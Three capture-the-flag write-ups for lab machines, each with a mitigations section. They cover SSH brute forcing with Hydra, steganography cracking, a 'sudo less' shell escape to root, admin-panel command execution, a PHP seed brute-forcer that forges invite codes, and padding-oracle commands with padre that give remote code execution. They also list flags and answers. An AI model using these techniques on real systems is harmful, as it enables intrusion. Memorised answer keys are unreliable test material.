Difficulty: Easy
Tags: CTF, Web Exploitation, Privilege Escalation, Steganography
Target IP: 10.114.158.7

Objective

Exploit a vulnerable web server to discover two flags, one from the user and the other from the root user.

Reconnaissance & Enumeration

Initial Access

The challenge begins by accessing the web service via the target IP: http://10.114.158.7

Upon visiting the homepage, inspecting the Page Source reveals a critical comment exposing a relevant hint that mentions steganography.

Steganography: the practice of representing information within another message or physical object, in such a manner that the presence of the concealed information would not be evident to an unsuspecting person’s examination.

There is a potential hidden content in the image from the main page.

Scanning Services

Making a quick scan of the web would be useful to get more context of our scenario and to verify which services are available using nmap http://10.114.158.7

Discovered services:

• ftp
• ssh
• http

Exploitation

Credential Discovery

Accessing through ftp service firstly verifying if the anonymous user is available to execute ftp anonymous@10.114.158.7 where usually it does not require any password to login.

The anonymous user is enabled. Exploring if there is any relevant file by executing ls, there is a relevant instance called note_to_jake.txt

Getting the file into the local machine by using get note_to_jake.txt

Following the command cat note_to_jake.txt in our local machine to read the content of the file.

Looks like a potential user to log in within ssh service is jake and his password is weak, therefore a brute-force it might be quick to guess it. Using Hydra, hydra -V -l jake -P /usr/share/wordlists/rockyou.txt 10.114.158.7 ssh

Jake’s password has been guessed (987654321). Let’s proceed by impersonating Jake’s ssh session, ssh jake@10.114.158.7

Alternative Credential Discovery

Downloading the suspicious image that in the page source mentions steganography. Extracting detailed metadata from the image using the command exiftool.

There was nothing relevant. After a quick google search an interesting command steghide was found, steghide extract -sf brooklyn99.jpg

It contains a passphrase. It could be brute forced, therefore, after another quick google search if there is a way to make a brute force attack into an image that hides information. Commandstegcracker was found, stegcracker brooklyn99.jpg /usr/share/wordlists/rockyou.txt

Image has been cracked and a new result file has created, cat brooklyn99.jpg.out

In this path Holt’s password (fluffydog12@ninenine) has been discovered instead of Jake. Logging as Holt, ssh holt@10.114.158.7

Command Execution & Privilege Escalation

Once logged in as jake, the common corroboration of the following command brings more context of the session: pwd and whoami

Step 1: Environment Check (Jake)

Executing basic commands to understand the environment:

• whoami → Returns current user.
• pwd → Returns current working directory.

Step 2: Finding the User Flag

After exploring within Jake’s session there is an interesting file.

Looks like it is a hash value (ee11cbb19052e40b07aac0ca060c23ee), could be Holts hash password, but let’s try if it is the user flag.

User flag: ee11cbb19052e40b07aac0ca060c23ee

Alternative Step 1: Finding the User Flag (Holt)

Proceed by extracting the user flag, ls and cat user.txt

We got the same user flag ee11cbb19052e40b07aac0ca060c23ee

User flag: ee11cbb19052e40b07aac0ca060c23ee

Step 3: Privilege Escalation

After extracting the user flag, the remaining flag is the root user. Verifying the current session privileges using sudo -l

After knowing that the command less can be executed with admin privileges it is time to explore exploits by looking into GTFOBins to accomplish the privilege escalation.

Replicating the steps by executing first sudo less /etc/hosts followed afterwards !/bin/sh and verify that we are actually the root user.

Step 4: Finding the Root Flag

Navigating into the root folder and reading the text file using cat root.txt

Root flag: 63a9f0ea7bb98050796b649e85481845

Conclusion

By scanning the IP, finding credentials via ftp service and steganography techniques, and exploiting a vulnerable shell with sudo privileges for a specific command to escalate privileges to become the root user, we successfully retrieved both flags.

Mitigations and Remediations

To prevent these specific vulnerabilities in a production environment, the following measures should be implemented:

1. Secure Coding Practices: remove all hardcoded credentials and internal paths from source code comments before deployment. Use automated scanning tools to detect secrets in code repositories.
2. Least Privilege Principles: the ssh service should run with the minimum necessary permissions. Specifically, the user running in the service should not have sudo access, especially with NOPASSWD privileges.
3. Hardened Password Policy: enforce the usage of complex password to avoid a feasible brute force attack and restrict the amount of attempts to log in.

Final Answers

1. User flag: ee11cbb19052e40b07aac0ca060c23ee
2. Root flag: 63a9f0ea7bb98050796b649e85481845

Difficulty: Easy
Tags: CTF, Web Exploitation, Privilege Escalation
Target IP: 10.113.133.17

Objective

Act as Bob, a security engineer, to identify the vulnerabilities exploited on the tourism website in the production environment, retrieve the hidden flags, and restore the website to its original state.

Reconnaissance & Enumeration

The challenge begins by accessing the web service via the target IP: http://10.113.133.17

Minified Javascript: the process of removing unnecessary characters from JavaScript code, such as whitespace, comments, and line breaks, without changing its functionality.

By mentioning “minified” it means that the JavaScript code was modified. Inspecting the Page Source reveals several critical clues:

<!-- Rest PHP code and html content -->


<!DOCTYPE html>
<html lang="en">


<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Tourism Website</title>
 
    <script src='/tailwind.min.js'></script> <!-- THIS IS OFFICIAL FILE - DO NOT CHANGE IT -->
  <script src='custom.min.js'></script> <!-- THIS IS CUSTOM JS FILE-->
  <link rel="stylesheet" href="/style.css">
</head>


<body>
  <!-- Navigation Bar -->
  <nav class="bg-gray-900 text-white p-6">
    <div class="flex justify-between items-center">
      <a href="/" class="text-lg font-bold">Tourism MHT </a>
      <ul class="flex items-center gap-5">
	  <!--  <li><a href="https://alexanderroca.dev/img" class="hover:text-gray-300">Logs</a></li>  Please keep all images in this folder -->
      <!--  <li><a href="./logs" class="hover:text-gray-300">Logs</a></li>  DevOps team to check and remove it later on -->


        
              
      </ul>
    </div>
  </nav>

  <!-- Main Content -->
  <main class=" mx-auto py-8  h-[80vh] flex items-center justify-center">

    <div class="rounded overflow-hidden shadow-lg bg-white  p-8 flex ">
		        <h2 class="text-gray-700 text-3xl py-6"> FINALLY HACKED !!! I HATE MINIFIED JAVASCRIPT</h2>
	    </div>

  </main>

  <!-- Footer -->
  <footer class="bg-gray-900 text-white flex items-center justify-center">
    <div class="text-center p-4">
      <p>&copy; 2023 Tourism.mht. All rights reserved.</p>
    </div>
  </footer></body>

</html>

It mentions PHP at the top of the source code. Moreover, there are relevant comments:

• custom.min.js: Custom JS file
• /img: Keeps all the images
• ./logs: To check logs and remove later for DevOps

Service Analysis

Inspecting the Network tab in browser development tools reveals a GET request to custom.min.js

Downloading and examining the file reveals the content is encoded in Hexadecimal (hex)

What type of encoding is used by the hackers to obfuscate the JavaScript file? hex

Using CyberChef to decode the hex string reveals the hidden message DIRECTORY LISTING IS THE ONLY WAY

What is the flag value after deobfuscating the file? DIRECTORY LISTING IS THE ONLY WAY

Directory Enumeration

Following the hints from the source code comments:

1. Image Directory (/img)

Visiting http://10.113.133.17/img reveals an Apache server running on Ubuntu. No immediate flags are found in the images.

2. Logs Directory (/logs)

Visiting http://10.113.133.17/logs reveals a file named email_dump.txt

What is the name of the file containing email dumps? email_dump.txt

Reading the content of email_dump.txt:

From: Bob <bob@tourism.mht>
To: Mark <mark@tourism.mht>
Subject: API Credentials

Hey Mark,

Sorry I had to rush earlier for the holidays, but I have created the directory for you with all the required information for the API.
You loved SSDLC so much, I named the API folder under the name of the first phase of SSDLC.
This page is password protected and can only be opened through the key. THM{100100111}

See ya after the holidays

Bob.

The email mentions the API folder is named after the first phase of SSDLC. The first phase is Planning.

The logs folder contains email logs and has a message for the software team lead. What is the name of the directory that Bob has created? Planning

The email also provides the password/key: THM{100100111}

What is the key file for opening the directory that Bob has created for Mark? THM{100100111}

Exploitation

Credential Discovery & API Abuse

Step 1: Accessing the Planning Directory

Visiting http://10.113.133.17/planning requires a password. Entering the key THM{100100111} grants access.

Step 2: Enumerating Users

Inside, we find instructions for an API endpoint: GET http://MACHINE_IP/api/?customer_id=1

The objective is to find specific user details via the API.

Finding User ID 5: Calling http://10.113.133.17/api/?customer_id=5 returns information for a client:

There is an information from the customer id=5, where the email is john@traverse.com and it is a client user.

What is the email address for ID 5 using the leaked API endpoint? john@traverse.com

Finding the Admin User: Iterating through IDs reveals that id=3 belongs to an administrator. Calling: http://10.113.133.17/api/?customer_id=3 reveals:

What is the ID for the user with admin privileges? 3

It displays the endpoint to get access /realadmin and it reveals an email realadmin@traverse.com, name admin and password admin_key!!!

What is the endpoint for logging in as the admin? Mention the last endpoint instead of the URL. /realadmin

Step 3: Gaining Admin Access

Navigating to http://10.113.133.17/realadmin:

Logging in with the credentials found (realadmin@traverse.com / admin_key!!!) grants access to the admin panel.

Step 4: Environment Check

The admin panel offers options to execute system commands.

• System Owner: output www-data (equivalent to whoami)
• Current Directory output /var/www/html/realadmin (equivalent to pwd)

Using the browser’s Network tab to intercept the POST request, we can modify the payload to execute arbitrary commands.

Sending commands=ls -lsa reveals the directory contents.

Two critical files are identified:

• thm_shell.php: likely the web shell used by the attacker.

Can you find the name of the web shell that the attacker has uploaded? thm_shell.php

• renamed_file_manager.php: a renamed file manager tool

What is the name of the file renamed by the attacker for managing the web server? renamed_file_manager.php

A password for the file manager is also displayed in the output:THM{10101}

Step 5: Restoring the Website

Accessing http://10.113.133.17/realadmin/renamed_file_manager.php with the passwordTHM{10101} opens the file manager.

Locating the index.php, we observe it has been modified to display “FINALLY HACKED” message.

Editing the file to remove the malicious message restores the site.

The final flag of this room is in the file: THM{WEBSITE_RESTORED}

Can you use the file manager to restore the original website by removing the “FINALLY HACKED” message? What is the flag value after restoring the main website? THM{WEBSITE_RESTORED}

Conclusion

By analyzing the source code for hidden comments and obfuscated JavaScript, we identified the encoding method and a hint for directory listing. Leveraging directory enumeration, we found an email dump that revealed the naming convention for a protected directory and the password to access it. Inside, we discovered an insecure API endpoint that allowed us to enumerate users and harvest admin credentials. Finally, using the admin panel to execute commands, we identified the attacker’s web shells, accessed the file manager, and restored the compromised website.

Mitigations and Remediations

To prevent these specific vulnerabilities in a production environment, the following measures should be implemented:

1. Code Review & Sanitization: remove all hardcoded credentials, internal paths, and debug messages from source code before deployment. Avoid leaving comments that hint at hidden directories.
2. Disable Directory Listing: configure the web server (Apache/Nginx) to disable directory listing (Options -Indexes) to prevent attackers from browsing file structures.
3. Secure API Endpoints: implement proper authentication and authorization checks on all API endpoints. Do not expose sensitive user data (emails, passwords) via unauthenticated or poorly secured GET requests.
4. Input Validation & Sandboxing: restrict the ability of web applications to execute system commands. If command execution is necessary, ensure strict input validation and sandboxing to prevent arbitrary code execution.

Final Answers

1. What type of encoding is used by the hackers to obfuscate the JavaScript file? hex
2. What is the flag value after deobfuscating the file? DIRECTORY LISTING IS THE ONLY WAY
3. What is the name of the file containing email dumps? email_dump.txt
4. What is the name of the directory that Bob has created? Planning
5. What is the key file for opening the directory that Bob has created for Mark? THM{100100111}
6. What is the email address for ID 5 using the leaked API endpoint? john@traverse.com
7. What is the ID for the user with admin privileges? 3
8. What is the endpoint for logging in as the admin? Mention the last endpoint instead of the URL. /realadmin
9. Can you find the name of the web shell that the attacker has uploaded? thm_shell.php
10. What is the name of the file renamed by the attacker for managing the web server? renamed_file_manager.php
11. Can you use the file manager to restore the original website by removing the “FINALLY HACKED” message? What is the flag value after restoring the main website? THM{WEBSITE_RESTORED}

Difficulty: Medium Tags: CTF, Web Exploitation Target IP: 10.114.184.31

Objective

The main objective is to exploit a weak cryptographic implementation to gain unauthorized access to the system, then leverage a padding oracle vulnerability to achieve remote code execution and retrieve the flags.

Reconnaissance & Enumeration

Scanning Services

Making a quick scan of the target to identify open ports and services using nmap. Executing a default scan, nmap 10.114.184.31

Output:

• ssh

Based on the result it might be interesting to scan even deeper using nmap -p- -sC -sV -T4 10.114.184.31

Output:

• ssh
• http

Exploring the HTTP service: http://10.114.184.31:1337

There are 3 interesting options to look further:

• Login
• Login with Invite Code
• API Documentation

Directory Scan

Looking to extract more possible paths using gobuster. Starting with a basic directory scan gobuster dir -u http://10.114.184.31:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Output:

• /css
• /js
• /logs
• /phpmyadmin

Extended Directory Scan with Extensions

Looking to execute a directory scan with extensions gobuster dir -u http://10.114.184.31:1337 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,zip

Output:

• /api.php
• /dashboard.php

Log Analysis

Investigating /logs endpoints http://10.114.184.31:1337/logs

It contains a log file called app.log

The relevant information to extract are:

• Email:alpha@fake.thm with the invitation code MTM0ODMzNzEyMg== has been deactivated
• Email: hello@fake.thm as a new user created
• URL: dashboard.php

Inspecting the main URL http://10.114.184.31:1337 with Network nav from browser development tools:

JavaScript Obfuscation Analysis

There is a script called api.js

function b(c,d){const e=a();return b=function(f,g){f=f-0x165;let h=e[f];return h;},b(c,d);}const j=b;function a(){const k=['16OTYqOr','861cPVRNJ','474AnPRwy','H7gY2tJ9wQzD4rS1','5228dijopu','29131EDUYqd','8756315tjjUKB','1232020YOKSiQ','7042671GTNtXE','1593688UqvBWv','90209ggCpyY'];a=function(){return k;};return a();}(function(d,e){const i=b,f=d();while(!![]){try{const g=parseInt(i(0x16b))/0x1+-parseInt(i(0x16f))/0x2+parseInt(i(0x167))/0x3*(parseInt(i(0x16a))/0x4)+parseInt(i(0x16c))/0x5+parseInt(i(0x168))/0x6*(parseInt(i(0x165))/0x7)+-parseInt(i(0x166))/0x8*(parseInt(i(0x16e))/0x9)+parseInt(i(0x16d))/0xa;if(g===e)break;else f['push'](f['shift']());}catch(h){f['push'](f['shift']());}}}(a,0xe43f0));const c=j(0x169);

Looks like the function has been obfuscated. Using the following website https://deobfuscate.io to deobfuscate the current code:

function b(c, d) {
  const e = a();
  return b = function (f, g) {
    f = f - 357;
    let h = e[f];
    return h;
  }, b(c, d);
}
const j = b;
function a() {
  const k = ["16OTYqOr", "861cPVRNJ", "474AnPRwy", "H7gY2tJ9wQzD4rS1", "5228dijopu", "29131EDUYqd", "8756315tjjUKB", "1232020YOKSiQ", "7042671GTNtXE", "1593688UqvBWv", "90209ggCpyY"];
  a = function () {
    return k;
  };
  return a();
}
(function (d, e) {
  const i = b, f = d();
  while (true) {
    try {
      const g = parseInt(i(363)) / 1 + -parseInt(i(367)) / 2 + parseInt(i(359)) / 3 * (parseInt(i(362)) / 4) + parseInt(i(364)) / 5 + parseInt(i(360)) / 6 * (parseInt(i(357)) / 7) + -parseInt(i(358)) / 8 * (parseInt(i(366)) / 9) + parseInt(i(365)) / 10;
      if (g === e) break; else f.push(f.shift());
    } catch (h) {
      f.push(f.shift());
    }
  }
}(a, 934896));
const c = j(361);

There is a constant value invoked by j(361) assigned to a constant variable c. By inserting console.log(c) within Console nav from the browser development tools it should display a value:

Output:

• H7gY2tJ9wQzD4rS1

Exploitation

Command Execution & Privilege Escalation

Trying this string (H7gY2tJ9wQzD4rS1) to access http://10.114.184.31:1337/api.php where it only requires a password, was the correct choice to access the API documentation.

After trying to log in as hello@fake.thm with the H7gY2tJ9wQzD4rS1 as the possible invitation code, it failed. Trying this string (H7gY2tJ9wQzD4rS1) to access http://10.114.184.31:1337/api.php where it only requires a password, it was the correct choice to access the API documentation.

Step 1: Cracking the Constant Value

It reveals the function that generates the invitation code against the user email.

function calculate_seed_value($email, $constant_value) {  
    $email_length = strlen($email);  
    $email_hex = hexdec(substr($email, 0, 8));  
    $seed_value = hexdec($email_length + $constant_value + $email_hex);  
    return $seed_value;  
}  
  
$seed_value = calculate_seed_value($email, $constant_value);  
mt_srand($seed_value);  
$random = mt_rand();  
$invite_code = base64_encode($random);

By knowing an existing active email hello@fake.thm it is only required to know the unknown constant_value. However, we already had an invitation sample code from alpha@fake.thm with the value of MTM0ODMzNzEyMg==. Observing the php code the invite_code value is encoded in base64 format. Using CyberChef to decode the value.

Output:

• 1348337122

This value was generated by mt_rand function. This function is a pseudo-random number generator that is not considered cryptographically secure, since if an attacker gets the seed, then the output can be predicted. The seed_value is generated by (seed_value = email_length + constant_value + email_hex):

• email_length
  • 14
• constant_value
  • Unknown
• email_hex
  • 61 6c 70 68 61 40 66 61 6b 65 2e 74 68 6d (using CyberChef)
  • Substring between 0 to 8: 616c7068
  • Decimal: 54 49 54 99 55 48 54 56

To get the constant_value we know the seed from alpha@fake.thm:

1348337122 = hexdec(14 + ? + 5449549955485456)

It is possible to loop over possible values by try and error, therefore typing a little script in php is going to be the way to discover the seed_value

<?php

$email = "alpha@fake.thm";
$target_invite_code = "MTM0ODMzNzEyMg==";

function calculate_seed_value($email, $constant_value) {

    $email_length = strlen($email); // 15
    $email_hex = hexdec(substr($email, 0, 8));
    $seed_value = hexdec((string)($email_length + $constant_value + $email_hex));

    return $seed_value;
}

echo "Starting...\n";

// Loop over possible constant values
for ($constant_value = 0; $constant_value < 100000; $constant_value++) {

    $seed_value = calculate_seed_value($email, $constant_value);
    mt_srand($seed_value);
    $random = mt_rand();
    $invite_code = base64_encode($random);

    if ($invite_code === $target_invite_code) {

        echo "Found constant value: $constant_value\n";
        break;
    }
}
?>

Output:

• 99999

Step 2: Generating Valid Invitation Codes

With the constant_value known, now it is possible to guess the seed_value that acts as the invitation code for hello@fake.thm.

<?php

$email = "hello@fake.thm";
$constant_value = "99999";

function calculate_seed_value($email, $constant_value) {  
    $email_length = strlen($email);  
    $email_hex = hexdec(substr($email, 0, 8));  
    $seed_value = hexdec($email_length + $constant_value + $email_hex);  
    return $seed_value;  
}  
  
$seed_value = calculate_seed_value($email, $constant_value);  
mt_srand($seed_value);  
$random = mt_rand();  
$invite_code = base64_encode($random);
echo "Invite code: $invite_code";
?>

Output:

• NDYxNTg5ODkx

The invitation code for hello@fake.thm is NDYxNTg5ODkx. Going back to the login with invite code page http://10.114.184.31:1337 and inserting the corresponding values to access into the account:

Flag after logging into the panel: THM{CryptographyPwn007}

From the dashboard view it is displayed another account admin@fake.thm, this account has an admin role. Knowing this new email and the constant_value of the seed generator function, it is possible to extract the invitation code from the admin@fake.thm account.

<?php

$email = "admin@fake.thm";
$constant_value = "99999";

function calculate_seed_value($email, $constant_value) {  
    $email_length = strlen($email);  
    $email_hex = hexdec(substr($email, 0, 8));  
    $seed_value = hexdec($email_length + $constant_value + $email_hex);  
    return $seed_value;  
}  
  
$seed_value = calculate_seed_value($email, $constant_value);  
mt_srand($seed_value);  
$random = mt_rand();  
$invite_code = base64_encode($random);
echo "Invite code: $invite_code";
?>

Output:

• MTc0OTQ0NzAzNw==

After attempting to log in as an admin@fake.thm using the generated invitation code MTc0OTQ0NzAzNw== it returned a failed attempt. Then, accessing as an admin uses a different encryption process.

Step 3: Padding Oracle Attack

Going back to hello@fake.thm account but this time using Burp Suite to observe all the interactions with the web service. Capturing the packet from the Proxy feature and sending the packet into Repeater to observe the response from the server.

There is a hidden input. The hidden input is declared as date with the value bRBHqQfs9f4UhFIitZJJelGfu+ezN6Ijmd7fg++7NVk=, this value changes on each refresh from the page. By deleting the value as an empty string and refreshing the web page to see if something happens.

Error Output:

• Padding error: error:0606506D:digital envelope routines:EVP_DecryptFinal_ex:wrong final block length

This system error displays the decryption operation reached the final block and the padding check failed. After a google search for the error EVP_DecryptFinal is part of OpenSSL API. After sending a few requests using different datevalues a new error emerged.

Output:

• Warning: openssl_decrypt(): IV passed is only 1 bytes long, cipher expects an IV of precisely 8 bytes, padding with \0 in /var/www/html/dashboard.php on line 28

This error means the code is calling openssel_decrypt() function with an IV (initialization vector) of the wrong length. The cipher/mode being used requires an 8-bytes. This value is common in ciphers such as DES/3DES in CBC mode. The value that we are providing is the IV.

After a research through the Internet, DES/3DES in CBC mode are susceptible into padding oracle and bit-flipping.

• Padding oracle attack: exploits how padding errors are handled. It occurs when the application reveals whether the padding of a decrypted message is valid or not, this enables to gain information about the plaintext without knowing the encryption key.

After dorking (site: github.com php padding oracle attack) through the internet to get a program that exploits this specific vulnerability. A good candidate was padre, it supports tokens in GET/POST parameters and Cookies. Download the latest version and grant executable permissions using chmod +x padre_linux_amd64.

After some try and error and getting used to the new tool,./padre-linux-amd64 -u 'http://10.114.184.31:1337/dashboard.php?date=$' -cookie 'PHPSESSID=754794498illlflv78gufj90hl' -enc 'ls'

Output:

• fXGHJVbs4t9lbmJyaWVhcw==

Executing again the same command but modifying the command that we want to execute, ./padre-linux-amd64 -u 'http://10.114.184.31:1337/dashboard.php?date=$' -cookie 'PHPSESSID=754794498illlflv78gufj90hl' 'fXGHJVbs4t9lbmJyaWVhcw=='

The system returned an output, therefore trying the specific path from the last flag question /home/ubuntu/flag.txt, ./padre-linux-amd64 -u 'http://10.114.184.31:1337/dashboard.php?date=$' -cookie 'PHPSESSID=754794498illlflv78gufj90hl' -enc 'cat /home/ubuntu/flag.txt'

Output:

• 8ToOYHlh0PuGepheR0TEN66XK6YqUx4yZQWGJFft495lbmJyaWVhcw==

Once having the encrypted command to get the flag we are going to use the following command ./padre-linux-amd64 -u 'http://10.114.184.31:1337/dashboard.php?date=$' -cookie 'PHPSESSID=754794498illlflv78gufj90hl' '8ToOYHlh0PuGepheR0TEN66XK6YqUx4yZQWGJFft495lbmJyaWVhcw=='

Having this value now its time to insert as the date value on the dashboard URL, http://10.114.184.31:1337/dashboard.php?date=8ToOYHlh0PuGepheR0TEN66XK6YqUx4yZQWGJFft495lbmJyaWVhcw==

Output:

• THM{GOT_COMMAND_EXECUTION001}

Content of the /home/ubuntu/flag.txt: THM{GOT_COMMAND_EXECUTION001}

Conclusion

By exploiting a weak pseudo-random number generator (mt_rand()) in the invitation code generation system, we successfully predicted valid invitation codes for any user email. This granted us access to the dashboard where we discovered a padding oracle vulnerability in the DES/CBC encryption implementation. Using the padre tool, we leveraged the padding oracle to achieve remote code execution and retrieve the final flag.

Mitigations and Remediations

To prevent these specific vulnerabilities in a production environment, the following measures should be implemented:

1. Cryptographically Secure Random Number Generation: replace mt_rand() with random_int() or openssl_random_pseudo_bytes() for security-critical operations.
2. Remove Error Leakage: implement generic error messages that don’t reveal internal cryptographic details.
3. Input Validation: validate and sanitize all user inputs, especially encrypted parameters passed to decryption functions.
4. Use Authenticated Encryption: implement AEAD modes instead of CBC mode to prevent padding oracle attacks entirely.

Final Answers

1. Flag after logging into the panel: THM{CryptographyPwn007}
2. Content of the /home/ubuntu/flag.txt: THM{GOT_COMMAND_EXECUTION001}